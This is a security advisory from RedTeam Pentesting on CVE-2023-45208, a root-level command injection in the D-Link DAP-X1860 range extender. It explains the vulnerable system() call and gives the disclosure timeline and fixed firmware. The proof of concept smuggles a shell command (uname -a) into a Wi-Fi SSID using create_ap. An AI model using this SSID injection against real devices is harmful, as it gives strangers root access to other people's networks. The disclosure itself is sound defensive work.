Contact

Contact us

+49 241 510081-0
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

D-Link DAP-X1860: Remote Command Injection

The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.

Details

  • Product: D-Link DAP-X1860
  • Affected Versions: Tested on 1.00, 1.01b94, DAP-X1860_fw_reva_101b05_01_ALL_multi_20230809, DAPX1860A1_FW100B12_20231023_beta01, DAPX1860A1_FW101B05_20231107_beta01 other versions may be affected, too
  • Fixed Versions: DAP-X1860_RevA_Firmware_101b05-01_20240122
  • Vulnerability Type: Command Injection
  • Security Risk: medium
  • Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
  • Advisory Status: published
  • CVE: CVE-2023-45208
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208

Introduction

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.

More Details

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action “GetSiteSurvey”. If a Wi-Fi network with an apostrophe (such as Olaf’s Network) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:

Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 7        11b/g/n     NONE   In 17       YES      NO
1   1   *****               **:**:**:**:**:** WPA2PSK/AES            24       11b/g/n     NONE   In 13 YES      NO
2   1   *****               **:**:**:**:**:** WPA2PSK/AES            47       11b/g/n/ax  NONE   In 13 YES      NO
3   1   *****               **:**:**:**:**:** WPAPSKWPA2PSK/TKIPAES  81       11b/g/n     NONE   In 7 YES      NO
4   1   *****               **:**:**:**:**:** WPA2PSKWPA3PSK/AES     63       11b/g/n/ax  NONE   In 19 YES      NO
5   1   *****               **:**:**:**:**:** WPA2PSK/AES            44       11b/g/n/ax  NONE   In 5 NO      NO
6   1   Olafs Network **:**:**:**:**:** WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh

The output sh: 7: not found indicates that the extender attempted to execute some command and the apostrophe that was originally present in the Wi-Fi network Olaf’s Network is missing in the output. Additionally, the sixth line does not have the same alignment of spaces compared to the other lines.

This alone can be exploited as a denial-of-service-vulnerability as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command uname -a which lists general kernel information. To do this, a Wi-Fi network within range was created with a SSID starting with a single quote and the command separated by the logical shell operator “&&”. The network was started using create_ap (https://github.com/oblique/create_ap):

$ create_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:

Error 500: Internal Server Error
CGI program sent malformed HTTP headers: [0   1   *****                **:**:**:**:**:**   WPA2PSK/AES 0        11b/g/n     NONE   In 17       YES      NO
1   1   Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: **:**:**:**:**:**: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
[...]
sh: 40: not

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user.

The vulnerability originates from the parsing_xml_stasurvey function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

[...]
snprintf(acStack_1a0,100,"echo %s > /tmp/Channel_check",&scanned_ap_info);
system(acStack_1a0);
[...]

Proof of Concept

Create a Wi-Fi network with an SSID containing a single quote, followed by some shell command separator, e.g. “&&” and the command to be run. In the following, create_ap (https://github.com/oblique/create_ap) was used to create the Wi-Fi network:

$ create_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3

To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender’s web interface.

Security Risk

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender’s local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender such that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.

Timeline

  • 2023-05-06 Vulnerability identified
  • 2023-05-08 Reported to security@dlink.com
  • 2023-06-19 After receiving no reply, a reminder was sent to security@dlink.com
  • 2023-07-21 After again receiving no reply, a D-Link security contact known from a previous disclosure was notified directly
  • 2023-08-07 After again receiving no reply, another reminder sent to security@dlink.com
  • 2023-10-05 CVE ID requested
  • 2023-10-05 CVE ID assigned
  • 2023-10-09 Advisory released
  • 2023-10-25 Hotfix patch DAPX1860A1_FW100B12_20231023_beta01 released by vendor (https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10360)
  • 2023-11-16 RedTeam Pentesting contacted vendor via support chat as hotfix patch cannot be installed due to a wrong firmware format
  • 2023-11-17 Vendor sent firmware (DAPX1860A1_FW101B05_20231107_beta01) with patch in correct format
  • 2023-11-23 RedTeam Pentesting confirmed that the vulnerability is still present and informed the vendor
  • 2023-11-24 Vendor replied
  • 2023-12-21 Vendor sent RedTeam Pentesting a new firmware (DAP-X1860_RevA_Firmware_101b05-01_20231219) for confirmation
  • 2024-01-03 RedTeam Pentesting confirmed that the vulnerability is fixed
  • 2024-01-03 Vendor released firmware DAP-X1860_RevA_Firmware_101b05-01_20240122 on product website (https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender)
  • 2024-06-27 Corrected fixed version in advisory and changed version strings in advisory to be more precise

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/

Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://jobs.redteam-pentesting.de/